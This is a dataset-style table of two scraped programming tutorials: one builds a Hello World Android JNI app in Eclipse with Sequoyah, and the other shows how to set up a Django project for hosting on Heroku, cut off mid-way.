text
stringlengths 20
1.01M
| url
stringlengths 14
1.25k
| dump
stringlengths 9
15
⌀ | lang
stringclasses 4
values | source
stringclasses 4
values |
|---|---|---|---|---|
This guide shows how to create an sample (Hello World type) Android JNI Application. Using Eclipse and Sequoyah, you can do everything inside the Eclipse IDE (there’s no need to run annoying command lines from Console or DOS prompt).
You should do the previous guide first in order to follow this guide. There is a bit of overlap from the previous guide (which is here:) so you can skip to step 4 if you have done the previous guide.
Step 1. Create a New Android project.
Select API level of at least 9. Do not use <space> in the project name or Android NDK may complain later.
Step 2. Add Native Support
This is where Sequoyah do its action.
Right click the project on Eclipse Workspace, then select Android Tools -> Add Native Support.
This dialog should come up:
Just leave the default values as default. , with an Android.mk and .cpp file.
Step 3. Build Project
The cpp file is empty right now, but we’re are finally ready to test building something. So do Build Project and hold your breath.
Examine the Eclipse Console window. You should see something like this:
[c] **** Build of configuration Default for project TestJNI **** bash C:\android-ndk-r5c\ndk-build V=1 cygwin warning: MS-DOS style path detected: C:\PERMADI_WORKSPACE\Test **** [/c]
If there’s any error, make sure that of your Android NDK environment is set-up correctly first before continuing.
Step 5. Open up the Activity class.
Should look like below:
[c] package com.permadi.testJNI; import android.app.Activity; import android.os.Bundle; public class TestJNIActivity extends Activity { /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); } } [/c]
Step 6. Add a function which we will implement natively in C++.
Let’s call it stringFromJNICPP() just because I feel like it.
); } public native String stringFromJNICPP(); } [/c]
Step 7. Load the native library.
[c] package com.permadi.testJNI; import android.app.Activity; import android.os.Bundle; public class TestJNIActivity extends Activity { //... same as above static { System.loadLibrary("TestJNI"); } } [/c]
How did I came up with that name (TestJNI)? This name is arbitrary but should match the LOCAL_MODULE specified in jni/Android.mk and it should not contain special-characters, not even a
[c] LOCAL_PATH := $(call my-dir) include $(CLEAR_VARS) LOCAL_MODULE := TestJNI ### Add all source file names to be included in lib separated by a whitespace LOCAL_SRC_FILES := TestJNI.cpp include $(BUILD_SHARED_LIBRARY) [/c]
Step 8. Add a TextView to display the message so that we can see that the native method is actually being called.
Here’s my main.xml, note the addition of TextView with id=myTextField:
[c] <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns: <TextView android: </LinearLayout> [/c]
Then I set the content of the TextView to the string returned by stringFromJNICPP() function.
My Activity class looks like this now (line 15 is where I call the CPP function and print the return value into the text field):
); TextView myTextField = (TextView)findViewById(R.id.myTextField); myTextField.setText(stringFromJNICPP()); } public native String stringFromJNICPP(); static { System.loadLibrary("TestJNI"); } } [/c]
Step 9. Add the native C++ code.
Open jni/TestJNI.cpp (this file should have been created for you by Step 2) and add this code.
[c] #include <string.h> #include <jni.h> #include <android/log.h> extern "C" { JNIEXPORT jstring JNICALL Java_com_permadi_testJNI_TestJNIActivity_stringFromJNICPP(JNIEnv * env, jobject obj); }; JNIEXPORT jstring JNICALL Java_com_permadi_testJNI_TestJNIActivity_stringFromJNICPP(JNIEnv * env, jobject obj) { return env->NewStringUTF("Hello From CPP"); } [/c]
The code simply returns a string saying Hello From CPP.
Notice how the function is named and how it needs to be exported because Android NDK mostly works with C.
Now, you might think that the function is insanely long, but this isn’t an arbitrary name because it actually follows a convention that tells the JNI to resolve which Java code references it. The convention is something like… the word Java_, followed by <your Java package name> with all the <dot> replaced with <underscores>, followed by <underscore>, then class name, followed by <underscore> and the function name. Confused? Here’s an excerpt from Java documentation at
Resolving Native Method Names
Dynamic linkers resolve entries based on their names. A native method name is concatenated from the following components:
the prefix Java_
a mangled fully-qualified class name
an underscore (“_”) separator
a mangled method name
for overloaded native methods, two underscores (“__”) followed by the mangled argument signature
Step 10. Create a Test Device.
Before testing, I recommend crating a new AVD that is compatible with API level 9 (if you don’t already have one) since the latest NDK recommend this level. Head over here if you don’t know how to create an AVD:. You can also test on a real device (I personally have ran this example on Nexus One phone).
When running, make sure that you select this AVD via Run->Run Configurations->Target.
Step 11. Build it.
Build the project from Eclipse (from the menu: Project->Build Project). This will build both the java and C/C++ source files as well as installing the resulting C/C++ into the package in one step. If you’re expecting to have to deal with command lines, it’s is a nice surprise that you don’t need to!
Make sure that the Eclipse Console is open (menu: Window->Show View->Console). There should be no error, with much luck. If there are, then head over below to the Common Errors section below.
Step 12. Run it.
Voila, here is it.
Download example project.
Common Errors
Error
[c] Multiple markers at this line - Method 'NewStringUTF' could not be resolved - base operand of '->' has non-pointer type '_JNIEnv' [/c]
Solution: You are probably using C convention inside CPP file. In general, the difference is below:
C:
[c] (*env)->NewStringUTF(env, "Hello From C"); [/c]
C++
[c] env->NewStringUTF("Hello From CPP"); [/c]
Error
[c] 07-09 07:47:31.103: ERROR/AndroidRuntime(347): FATAL EXCEPTION: main 07-09 07:47:31.103: ERROR/AndroidRuntime(347): java.lang.UnsatisfiedLinkError: stringFromJNI_CPP</pre> [/c]
Solution:
- Do not use underscore in JNI function names.
- Are you loading the right library name?
Error
[c] first defined here TestJNI line 5, external location: C:\PERMADI_WORKSPACE\TestJNI\obj\local\armeabi\objs\TestJNI\com_permadi_testJNI_TestJNIActivity.o:C:\PERMADI_WORKSPACE\TestJNI\jni\com_permadi_testJNI_TestJNIActivity.c C/C++ Problem make: *** [/cygdrive/c/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/libTestJNI.so] Error 1 TestJNI C/C++ Problem multiple definition of `Java_com_permadi_testJNI_TestJNIActivity_stringFromJNI' com_permadi_testJNI_TestJNIActivity.c /TestJNI/jni line 5 C/C++ Problem [/c]
or
[c] C:/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/objs/TestJNI/com_permadi_testJNI_TestJNIActivity.o: In function `Java_com_permadi_testJNI_TestJNIActivity_stringFromJNI': C:/PERMADI_WORKSPACE/TestJNI/jni/com_permadi_testJNI_TestJNIActivity.c:5: multiple definition of `Java_com_permadi_testJNI_TestJNIActivity_stringFromJNI' C:/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/objs/TestJNI/com_permadi_testJNI_TestJNIActivity.o:C:/PERMADI_WORKSPACE/TestJNI/jni/com_permadi_testJNI_TestJNIActivity.c:5: first defined here collect2: ld returned 1 exit status make: *** [/cygdrive/c/PERMADI_WORKSPACE/TestJNI/obj/local/armeabi/libTestJNI.so] Error 1 [/c]
Possible solution:
- Make sure there’s no duplicate function names.
- Check the Android.mk to ensure that no source file is being compiled multiple times. For instance, at some point my Makefile was messed up like this, with one of the source file (com_permadi_testJNI_TestJNIActivity.c) being added twice, which caused the error.
[c] LOCAL_PATH := $(call my-dir) include $(CLEAR_VARS) LOCAL_MODULE := TestJNI ### Add all source file names to be included in lib separated by a whitespace LOCAL_SRC_FILES := TestJNI.cpp com_permadi_testJNI_TestJNIActivity.c com_permadi_testJNI_TestJNIActivity.c include $(BUILD_SHARED_LIBRARY) [/c]
Error
[c] Description Resource Path Location Type Method 'NewStringUTF' could not be resolved com_permadi_testJNI_TestJNIActivity.c /TestJNIC/jni line 6 Semantic Error Type 'JNIEnv' could not be resolved com_permadi_testJNI_TestJNIActivity.c /TestJNIC/jni line 4 Semantic Error Type 'jobject' could not be resolved com_permadi_testJNI_TestJNIActivity.c /TestJNIC/jni line 4 Semantic Error Type 'jstring' could not be resolved com_permadi_testJNI_TestJNIActivity.c /TestJNIC/jni line 4 Semantic Error [/c]
Solution:
This is actually a very strange error because I have seen it suddenly creeping up on projects that had compiled fine before. There must be a bug somewhere (in Eclipse, NDK, SDK?) which caused this to happen in some situations and intermittently — and I don’t know what triggers it. The remedy (hack) is to add the android-ndk include path into the Project Property->C/C++ paths.
Open the Project Properties. Expand the C/C++ General section, then select the Paths and Symbols sub-section. In the Includes tab, select GNU C, enter the
Do the same to the GNU C++ section. Click Apply. Agree when asked to rebuild index. Then rebuild the project. The error is magically gone. What’s odd is that once the build is successful, you can remove the paths that you have just added, make code changes that triggers a recompile, and the error usually won’t come back.
Where to go from here
Examine the NDK sample codes and see how things work. There are Open GL samples if you’re into game programming. See this guide on how to compile them within Eclipse:
[...] Creating your first Android JNI/NDK Project in Eclipse with Sequoyah [...]
[...] that you need the environment described here to use this example: Bookmark on Delicious Digg this post Recommend on Facebook Share with [...]
Sorry, I meant to ask, is there a particular reason for the “Select API level of at least 9″?
Does something bad happen is leve 8 is used?
According to the Google Doc (), “Applications that use native activities must be run on Android 2.3 or later.” This is why on the example, we use api level 9.
Nice tutorial, I had the same problem with jobject/JNIEXPORT/etc. and I’m glad I found the answer here.
|
http://permadi.com/blog/2011/09/creating-your-first-android-jnindk-project-in-eclipse-with-sequoyah/
|
CC-MAIN-2015-22
|
en
|
refinedweb
|
An alternative API for performant streaming XML processing: XSE (Xml Streaming Events)
Note: this entry has moved.
As a followup to my previous posts (
part I and
part II), I have been thinking if there's a way to completely avoid the
cost intrinsically associated with XPath, that is, the need to load a complete
XML document in-memory (be it an
XmlDocument or an
XPathDocument,
it's the same problem basically). Of course there's a way, I almost hear you
say, use an
XmlReader! There are a lot of scenarios where it makes
perfect sense to do so. However, I've (unfortunately) found that most
developers get easily tired of writing the same code performing the
Read()
calls, endless switch/if statements checking the current reader's Depth,
maintaining flags to signal processed elements (basically building a primitive
state machine which is required whenever you need more flexibility than simple
element name/namespace lookup), etc.
Typical code looks pretty ugly. For example, imagine I wanted to count the number of items I have viewed recently with RssBandit (by querying the file used by its cool Remote Storage feature). The corresponding XPath expression would be:
count(/r:feeds/r:feed/r:stories-recently-viewed/r:story),
where
xmlns:r="". Pretty
simple to use with an XPathNavigator or XmlDocument, right? Well, the
unbeatable-fast approach looks acceptably bad:
In case you doubt my word that this IS the fastest approach, here are the
numbers, for a 77kb file, where I didn't measure the time it takes to
pre-compile the XPath expression:
XmlTextReader: 28
XPathDocument: 562
Now imagine that you also need to build stats about
dc:creator (where
xmlns:dc=""), you have to process
xmlns:trackback=""
elements, etc. Well, most probably, you will give up to the unbeatable-fast
approach and load an
XPathDocument (I hope) and start executing pre-compiled
XPathExpression instances against it. Well, it's my personal
experience that not even the example I showed above is tackled with the
XmlReader approach. Believe me, I've seen developers load an *
XmlDocument*
just to issue an
//Error (?!) XPath query just to determine if
there was an error after some processing!! Unfortunately, except for the most
simple cases, using the
XmlReader is pretty difficult and leads to
code that is hard to maintain and extend.
What's more, there are a LOT of scenarios when there's not even a chance to know ahead of time what needs to be processed. For example, think about a webservice that receives a multi-namespaced XML file and processes information items from each namespace with different modules, specified through configuration. You want one example? RSS: there are a buch of namespaces that can go in there. The same goes for any other service that allows extensibility through namespaces, such as SOAP. Another example are XPath-based rules languages ( one such is Schematron ). But not only complex cases apply here, even loading deeply nested configuration files is extremely cumbersome without the help of XPath or XmlSerializer.
Alternatives in alternate worlds: SAX?
Java developers would say: "if you only had SAX...". Well, I'm no experienced Java developer, so if there's anybody out there reading this: first, you're in the wrong place, second, feel free to correct me in this section. In order to get a good feeling of what we are missing with SAX, I downloaded one cool (I thought it was, at least) piece of java code, SAX-creator David Megginson's RdfFilter, which is a concrete use case of SAX2-based processing and extensibility to handling XML. First let me say that I doubt most java developers take the approach of creating such a cool XMLFilterImpl (the SAX filters that expose events in a more usable way to the developer) for regular needs. However, it does show what SAX-based programming looks like. Guess what, it doesn't look very different than XmlReader:
I removed comments to clarify the code. Of course, it has a more cool state
machine than our example's 4 bool variables, but you get the idea. Looking at
this code, however, I learned a cool thing about SAX: specialized filters
can expose more specific events than the
startElement, and that
would make the client code far easier to write. However, most Java developers
(again, correct me if I'm wrong, but I asked a couple ones' opinion only)
simply create a new empty filter and implement the method they are
interested in, more often with much less elegancy than the code above. Just the
quick and dirty way to get the job done. That leads, of course, to equally
difficult to maintain/extend code as the
XmlReader approach does.
The idea of having a specialized strategy (filter in SAX) process and expose higher-level events is appealing. The developer of this strategy could have optimized the state machine it uses, has already debugged the code, etc. However, the strategy has to be manually created, and it only serves the single purpose it was created for. For example, there's no way we can use the RDFFilter to aid us in processing anything else than RDF (of course we can still get the lower-level SAX events, but how is that any useful at all?).
Enter the XSE: Xml Streaming Events
The solution I'm thiking of (and activily coding), is based on an improvement of SAX and the XmlReader. Main requirements are:
- Streaming processing: I don't want to pay the price of full XML loading.
- Support for dynamic expressions: I don't want to code a new filter/strategy/handler/whatever class for each new type of element to match.
- Callbacks for matched/subscribed elements: I just want to get called when something I'm interested in was found. For example, it's completely useless for me to get called by an
ElementStartedevent when the element is not in the namespace I expect (or the path, or has the attribute, or...).
- Compiled code: the price to support dynamic expressions shouldn't be performance. I want the same performance I can get by manually coding the ugliest switch statement required to get the job done, FAST.
- Support for pre-compilation and reuse of expressions: I want to increase performance by caching and thread-safely reusing expresions I know ahead of time.
Given the first requirement, it's pretty obvious that the solution will be XmlReader-based. The following are a number of code samples showing usage of XSE in Whidbey (I've back-ported to v1.x too, don't worry):
The "strange" syntax following the delegate keyword is the new SUPER cool anonymous methods feature of C# v2. Equivalent v1.x code only needs to change that single line:
If you want to process all elements in a certain namespace (let's say, the Dublin Core), irrespective of its location, you would use something like this:
The compiled strategy can be cached statically and reused by multiple threads
simultaneously, as a call to
XseReader.AddHandler performs a
Clone
on it.
By now you may have realized that the real secret of all this are the concrete factories. Each factory is able to create strategies to match a specific expression language. The two I showed are XPath-like or subsets of it. You can even come up with your own expression format, given you provide an appropriate factory for it.
You may have noted that the expression from the last example above is not valid according to XPath syntax. The equivalent in XPath would be:
dc:*. If you wanted to process all elements from all namespaces, my syntax is simply
*.
And to process an element from any namespace, you use
*:item, instead of the XPath
The most important piece here is what does the strategy returned from the factory look like. Well, for the two ones above, what I basically did is analyze the expression and emit the ugliest-unbeatable-fast-if-else implementation you can think of. Almost exactly the one I showed at the beginning. Now for the numbers, which is the main reason I started this project:
Everett:
XmlTextReader: 28
XseReader: 38
XPathDocument: 562
Whidbey:
XmlTextReader: 18
XseReader: 23
XPathDocument: 478
XPathDocument2: 234
These are the tests for each approach, against the story count test
expression discussed at the beginning. Quite impressive, right? Note
that even when
XPathDocument2 in Whidbey performs a superb job at
improving the
XPathDocument performance, it's still an order of
magnitude slower that the XSE approach. Here we can also appreciate the good
work of the XML team in improving even the raw XML parser, by an important
percentage (28 vs 18, wow). That directly benefits XSE too. Tests were as
fair as I could make them: all XPath expressions are precompiled, XmlNameTable
pre-cached, etc. I made the biggest effort to make XPath numbers do better, but
that's honestly its limit. When I post the tests code, you'll believe me,
hopefully ;).
The code is being polished now, and I'm trying to come up with more factories that may be useful, specially adding attribute and child element value evaluation, but that requires a little bit more work to achieve with only a reader at hand :o). I'm also trying to use direct Reflection.Emit instead of CodeDom for compiling the strategy, but I still have to measure the perf. improvement that would yield in expression compilation. You can infer that caching the compiled strategy (just like XPathExpressions, but much more in this case) greately improves performance. I haven't implemented an internal strategy cache yet, which would also help there.
I'm doing some major rearrangements in my NMatrix opensource project so that I can concentrate all my XML-related efforts in a single NMatrix.Xml assembly, such as Schematron.NET, XSE and others.
As you can see, flexibility and performance are two cornerstones of this approach. I wanted both, and I think it delivers. In the upcoming posts I will discuss how it's implemented, and I welcome everyone interested in improving it or making suggestions, to make comments to this post, so that we can finally say to Java developers: "If you only had XSE...".
Update: read these follow-up:
|
http://weblogs.asp.net/cazzu/XseIntro
|
CC-MAIN-2015-22
|
en
|
refinedweb
|
Hello,
we built an app with der Viewer Builder yesterday. Our folios were shown in the development app correctly.
Then we made one update yesterday in the afternoon and tomorrow after installing the new folio builder panel (not the folio producer tools).
We get correctly updated folios in the Content Viewer on the iPad but no update in the development app.
After updateing the viewer builder we rebuilt the app (now V19) but it didn't solve the problem.
The folios in the Content Viewer are still okay.
What can we do?
Neele
I am in exactly the same situation.
Updated folios are displayed when testing in the content viewer
Export from the folio producer
import the updated file into the "manage" view of the viewer builder
drag into itunes - content of the app remains as previous - no update
how do i test this to upload to the store - im happy with it in content viewer!
please help - im on a deadline!
;-)
SORTED!
and i feel like an idiot!
In the Folio Producer, near the export button, there is a button marked "UPDATE" press this and your folios will be updated!
follow the rest of the steps and the update appears!
Doh!!
Posted this just in case there isanyone else out there who cant see the "UPDATE" button!!!!!!
|
https://forums.adobe.com/message/4340792?tstart=0
|
CC-MAIN-2015-22
|
en
|
refinedweb
|
Implement game leaderboard using Redis
This is the Third Post in The Redis Series.
Part One: Install Redis inside Ubuntu VM
Part Two: Redis Persistence by Example
Part Three: Implement game leaderboard using Redis 👈
Part Four: Implement Job Queue using Redis
Part Five: Building REST API backed by Redis
Part Six: Building Chat Service in Golang and Websockets backed by Redis
Part Seven: Redis Cluster configurations by example
Part Eight: Redis Geospatial by example
In this post, we will talk about the Sorted Set and some of its operations, then work with sorted sets in the
redis-cli client and then switch to
golang and implement a simple scoring using Redis. In the end we will compare the performance of running against Redis in RDB and AOF storage modes.
Let’s know about the Sorted Set data structure in Redis
Sorted Set is like a Set data structure in which it contains non-repeating elements. however, it is different in that, each member is associated with a score.
Sorted set commands are stared with the Z character:
For the sake of this example, we need to focus on the following commands:
ZADD: Adds all the specified members with the specified scores to the sorted set stored at key.
ZCARD: Get number of members in a sorted set (cardinality)
ZINCRBY: Increments the score of a member in the sorted set stored by value.
ZSCORE: Return the score associated with a given member in a sorted set.
ZRANGE: Returns the specified range of elements in the sorted set stored and take WITHSCORES to return scores as well.
ZREVRANGE: similar to ZRANGE but return elements sorted by score.
You can read more about other sorted set commands in the documentation.
Working with redis-cli
Let’s try sorted set operations in
redis-cli. First, make sure you have installed Redis as specified in the first post in this series.
Now let’s connect to the VM using vermin, you might need to start the VM if it is not started:
$ vermin ps -a
VM NAME IMAGE CPUS MEM DISK TAGS
vm_01 ubuntu/focal 1 1024 2.8GB redis
Then start the VM if it is not running:
$ vermin start vm_01
Now, let’s ssh into the VM and start
redis-cli command:
$ vermin ssh vm_01
✔ Establishing connection
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)Last ...
...
vermin@verminbox:~$ redis-cli
127.0.0.1:6379>
Let’s work with the sorted set commands as follows:
127.0.0.1:6379> zadd myss 10 Java 20 Redis 30 GO
(integer) 3
This command added 3 elements to the sorted set
myss, “Java” with score 10, then “Redis” with score 20 and finally “GO” with score 30.
Now let’s increment the score of Redis by 1:
127.0.0.1:6379> ZINCRBY myss 1 Redis
"21"
Now let’s show the sorted set elements along with its score:
127.0.0.1:6379> zrange myss 0 -1 WITHSCORES
1) "Java"
2) "10"
3) "Redis"
4) "21"
5) "GO"
6) "30"
Note, the
ZRANGEcommand takes the first parameter the key, then the start index, and then the stop index (0 and -1 where -1 means the latest index), and finally
WITHSCORESreturns the elements along with their scores.
We could use
ZREVRANGEto get the elements sorted by scores.
And we can verify that we have 3 elements using
ZCARD myss command.
Implementing the game scoring in go
Next, we will implement simple game scoring using Golang and go-redis library.
I run the application on my macOS desktop however I am running Redis inside VM, so I’ve to do port forwarding so I can access the port from my local macOS desktop. In a new Terminal write:
$ vermin port vm_01 6379Connected. Press CTRL+C anytime to stop
I am using Intellij/Golang but any IDE can be used.
Here’s the source code:
package main
import (
"fmt"
"github.com/go-redis/redis/v7"
"log"
"math/rand"
"time"
)
func init() {
rand.Seed(time.Now().Unix())
}
const key = "players"
func main() {
c := redis.NewClient(&redis.Options{
Addr: "localhost:6379",
})
c.Del(key) // remove the key from redis for clean start
for i := 0; i < 10000; i++ {
player := getWinnerPlayer()
err := c.ZIncr(key, &redis.Z{
Score: 1,
Member: player,
}).Err()
if err != nil {
log.Fatal(err)
}
}
result, _ := c.ZRevRangeWithScores(key, 0, -1).Result()
fmt.Println(result)
}
func getWinnerPlayer() string {
players := []string{"Mohammad", "Ali", "John", "Abdullah", "Farida"}
return players[rand.Intn(len(players))]
}
First, create a client for Redis. Then we call
getWinnerPlayer() function that simulates a winner player among the 5 players we have.
Then we call
ZIncr to increment the score of the selected player by 1. And at the end, we call
ZRevRangeWithScores to get a map of the score and associated element sorted by score. We do this 10000 times.
I got the following result. however, you might get a different result:
$ go build; time ./redis-go
[{2033 John} {2030 Ali} {2002 Abdullah} {1981 Mohammad} {1954 Farida}]
./redis-go 0.32s user 0.41s system 15% cpu 4.570 total
Comparing Performance:
This part we will compare the performance of RDB vs AOF, so it is good to go and read the second part of this series here before continuing to make some context.
By default Redis is running in RDB mode(Snapshotting), so the result of running 10000 queries was around 4.5 seconds as shown above.
Now Let’s change the configuration to use AOF and change
fsycnpolicy to always (so every time a new command is appended to the log)
127.0.0.1:6379> config set appendonly yes
OK
127.0.0.1:6379> config set appendfsync always
OK
127.0.0.1:6379> config rewrite
OK
Now let’s run the previous program and compare the results:
go build; time ./redis-go
[{2089 Mohammad} {2001 John} {1986 Farida} {1968 Ali} {1956 Abdullah}]
./redis-go 0.33s user 0.41s system 6% cpu 11.174 total
Ohh, it is around 11 seconds, which is about 3 times slower than running with RDB only enabled.
If we enable AOF with the default
fsyncwhich is every second, we got a performance comparable with when we using RDB only(snapshotting).
Resources:
Command reference - Redis
COMMAND INFO command-name [command-name ...] Get array of specific Redis command details
redis.io
Data types - Redis
Strings are the most basic kind of Redis value. Redis Strings are binary safe, this means that a Redis string can…
redis.io
|
https://mohewedy.medium.com/implement-game-scoring-using-redis-75660f739760?source=post_internal_links---------1----------------------------
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
As a novice web developer, you’ve built your portfolio app and shared your code on GitHub. Perhaps, you’re hoping to attract technical recruiters to land your first programming job. Many coding bootcamp graduates are likely doing the same thing. To differentiate yourself from the crowd and boost your chances of getting noticed, you can start hosting your Django project online.
For a hobby Django project, you’ll want a hosting service that’s free of charge, quick to set up, user-friendly, and well-integrated with your existing technology stack. While GitHub Pages is perfect for hosting static websites and websites with JavaScript, you’ll need a web server to run your Flask or Django project.
There are a few major cloud platform providers operating in different models, but you’re going to explore Heroku in this tutorial. It ticks all the boxes—it’s free, quick to set up, user-friendly, and well-integrated with Django—and is the favorite cloud platform provider of many startups.
In this tutorial, you’ll learn how to:
- Take your Django project online in minutes
- Deploy your project to Heroku using Git
- Use a Django-Heroku integration library
- Hook your Django project up to a standalone relational database
- Manage the configuration along with sensitive data
To follow along, you can download the code and other resources by clicking the link below:
Get Source Code: Click here to get the companion Django project as well as snapshots of the individual steps followed in this tutorial.
Demo: What You’ll Build
You’re going to create a bare-bones Django project and deploy it to the cloud straight from the terminal. By the end, you’ll have a public and shareable link to your first Heroku app.
Here’s a one-minute video demonstrating the necessary steps, from initializing an empty Git repository to viewing your finished project in the browser. Hang on and watch till the end for a quick preview of what you’re about to find in this tutorial:
In addition to the steps shown in the screencast above, you’ll find a few more later on, but this should be enough to give you a general idea about how you’ll be working with Heroku in this tutorial.
Project Overview
This tutorial isn’t so much about building any particular project, but rather hosting one in the cloud using Heroku. While Heroku supports various languages and web frameworks, you’ll stick to Python and Django. Don’t worry if you don’t have any Django projects on hand. The first step will walk you through scaffolding a new Django project to get you started quickly. Alternatively, you can use a ready-made sample project that you’ll find later.
Once you have your Django project ready, you’re going to sign up for a free Heroku account. Next, you’ll download a convenient command-line tool that will help you manage your apps online. As demonstrated in the screencast above, the command line is a quick way of working with Heroku. Finally, you’ll finish off with a deployed Django project hosted on your newly-configured Heroku instance. You can think of your final result as a placeholder for your future project ideas.
Prerequisites
Before jumping ahead, make sure that you’re familiar with the basics of the Django web framework and that you’re comfortable using it to set up a bare-bones project.
Note: If you’re more experienced with Flask than Django, then you can check out a similar tutorial about Deploying a Python Flask Example Application Using Heroku.
You should also have a Git client installed and configured so that you can interact conveniently with the Heroku platform from the command line. Finally, you should seriously consider using a virtual environment for your project. If you don’t already have a specific virtual environment tool in mind, you’ll find some options in this tutorial soon.
Step 1: Scaffold a Django Project for Hosting
To host a Django web application in the cloud, you need a working Django project. For the purposes of this tutorial, it doesn’t have to be elaborate. Feel free to use one of your hobby projects or to build a sample portfolio app if you’re short on time, and then skip ahead to creating your local Git repository. Otherwise, stick around to make a brand new project from scratch.
Create a Virtual Environment
It’s a good habit to start every project by creating an isolated virtual environment that won’t be shared with other projects. This can keep your dependencies organized and help avoid package version conflicts. Some dependency managers and packaging tools like Pipenv or poetry automatically create and manage virtual environments for you to follow best practices. Many IDEs like PyCharm do this by default, too, when you’re starting a new project.
However, the most reliable and portable way of creating a Python virtual environment is to do it manually from the command line. You can use an external tool such as virtualenvwrapper or call the built-in
venv module directly. While virtualenvwrapper keeps all environments in a predefined parent folder,
venv expects you to specify a folder for every environment separately.
You’ll be using the standard
venv module in this tutorial. It’s customary to place the virtual environment in the project root folder, so let’s make one first and change the working directory to it:
$ mkdir portfolio-project $ cd portfolio-project/
You’re now in the
portfolio-project folder, which will be the home for your project. To create a virtual environment here, just run the
venv module and provide a path for your new environment. By default, the folder name will become the environment’s name. If you want to, you can instead give it a custom name with the optional
--prompt argument:
$ python3 -m venv ./venv --prompt portfolio
A path starting with a leading dot (
.) indicates that it’s relative to the current working directory. While not mandatory, this dot clearly shows your intent. Either way, this command should create a
venv subdirectory in your
portfolio-project root directory:
portfolio-project/ │ └── venv/
This new subdirectory contains a copy of the Python interpreter along with a few management scripts. You’re now ready to install project dependencies into it.
Install Project Dependencies
Most real-life projects depend on external libraries. Django is a third-party web framework and doesn’t ship with Python out-of-the-box. You must install it along with its own dependencies in your project’s virtual environment.
Don’t forget to activate your virtual environment if you haven’t already. To do so, you’ll need to execute the commands in one of the shell scripts available in the virtual environment’s
bin/ subfolder. For example, if you’re using Bash, then source the
activate script:
$ source venv/bin/activate
The shell prompt should now display a prefix with your virtual environment’s name to indicate it’s activated. You can double-check which executables the specific commands are pointing to:
(portfolio) $ which python /home/jdoe/portfolio-project/venv/bin/python
The above output confirms that running
python will execute the corresponding file located in your virtual environment. Now, let’s install the dependencies for your Django project.
You’ll need a fairly recent version of Django. Depending on when you’re reading this, there might be a newer version available. To avoid potential compatibility problems, you may want to specify the same version as the one used at the time of writing this tutorial:
(portfolio) $ python -m pip install django==3.2.5
This will install the 3.2.5 release of Django. Package names are case insensitive, so it doesn’t matter whether you type
django or
Django, for example.
Note: Sometimes, you’ll see a warning about a newer version of
pip being available. It’s usually harmless to ignore this warning, but you’ll need to consider upgrading for security reasons if you’re in a production environment:
(portfolio) $ python -m pip install --upgrade pip
Alternatively, you can disable the version check in the configuration file if it’s bothering you and you’re aware of the possible consequences.
Installing Django brings a few additional transitive dependencies, which you can reveal by listing them:
(portfolio) $ python -m pip list Package Version ---------- ------- asgiref 3.4.1 Django 3.2.5 pip 21.1.3 pytz 2021.1 setuptools 56.0.0 sqlparse 0.4.1
Since you want others to be able to download and run your code without problems, you need to ensure repeatable builds. That’s what freezing is for. It outputs roughly the same set of dependencies with their sub-dependencies in a special format:
(portfolio) $ python -m pip freeze asgiref==3.4.1 Django==3.2.5 pytz==2021.1 sqlparse==0.4.1
These are essentially the arguments to the
pip install command. However, they’re usually encapsulated within one or more requirements files that
pip can consume in one go. To create such a file, you can redirect the output of the
freeze command:
(portfolio) $ python -m pip freeze > requirements.txt
This file should be committed to your Git repository so that others can install its contents using
pip in the following way:
(portfolio) $ python -m pip install -r requirements.txt
At the moment, your only dependency is Django and its sub-dependencies. However, you must remember to regenerate and commit the requirements file every time you add or remove any dependencies. This is where the package managers mentioned earlier might come in handy.
With that out of the way, let’s start a new Django project!
Bootstrap a Django Project
Every Django project consists of similar files and folders that follow certain naming conventions. You could make those files and folders by hand, but it’s usually quicker and more convenient to do in an automated way.
When you install Django, it provides a command-line utility for administrative tasks such as bootstrapping new projects. The tool is located in your virtual environment’s
bin/ subfolder:
(portfolio) $ which django-admin /home/jdoe/portfolio-project/venv/bin/django-admin
You can run it in the shell and pass the name of your new project as well as the destination directory where it’ll create the default files and folders:
(portfolio) $ django-admin startproject portfolio .
Alternatively, you could achieve the same result by calling the
django module:
(portfolio) $ python -m django startproject portfolio .
Notice the dot at the end of both commands, which indicates your current working directory,
portfolio-project, as the destination. Without it, the command would create another parent folder with the same name as your project.
If you’re getting a
command not found error or
ModuleNotFound exception, then make sure you’ve activated the same virtual environment where you installed Django. Some other common mistakes are naming your project the same as one of the built-in objects or not using a valid Python identifier.
Note: Starting a new Django project from scratch with the administrative tools is quick and flexible but requires a lot of manual labor down the road. If you’re planning to host a production-grade web application, then you’ll need to configure security, data sources, and much more. Choosing a project template that follows best practices might save you some headaches.
Afterward, you should have this directory layout:
portfolio-project/ │ ├── portfolio/ │ ├── __init__.py │ ├── asgi.py │ ├── settings.py │ ├── urls.py │ └── wsgi.py │ ├── venv/ │ ├── manage.py └── requirements.txt
You created a management app named
portfolio, which contains project-level settings and the main file with URL patterns, among a few other things. You also created the
manage.py script that conveniently wraps
django-admin and hooks up to your project.
You now have a bare-bones yet runnable Django project. At this point, you would typically start one or more Django apps and define their views and models, but they aren’t necessary for this tutorial.. This way, you don’t need to install and set up a full-blown database like MySQL or PostgreSQL.
To update the database schema, run the
migrate subcommand:
(portfolio) $ python manage.py migrate
After successfully applying all pending migrations, you’ll find a new file named
db.sqlite3 in your project root folder:
portfolio-project/ │ ├── portfolio/ │ ├── __init__.py │ ├── asgi.py │ ├── settings.py │ ├── urls.py │ └── wsgi.py │ ├── venv/ │ ├── db.sqlite3 ├── manage.py └── requirements.txt
You can inspect its contents with the
sqlite3 command-line utility, Python’s built-in
sqlite3 module, or your favorite database administration tool. By now, this file should contain a few tables for the internal apps responsible for authentication, session management, and so on, as well as a metatable to keep track of the applied migrations.
Run a Local Development Server
Before increasing the complexity by throwing Heroku on top of your project, it makes sense to test everything out on a local computer. This may spare you a lot of unnecessary debugging. Fortunately, Django comes with a lightweight web server for development purposes, which requires little to no configuration.
Note: Technically, you can take advantage of the same development server built into Django on Heroku. However, it wasn’t designed to handle real-life traffic, nor is it secure. You’re better off using a WSGI server like Gunicorn.
To run the development server, type the following command in your terminal window where you activated the virtual environment before:
(portfolio) $ python manage.py runserver
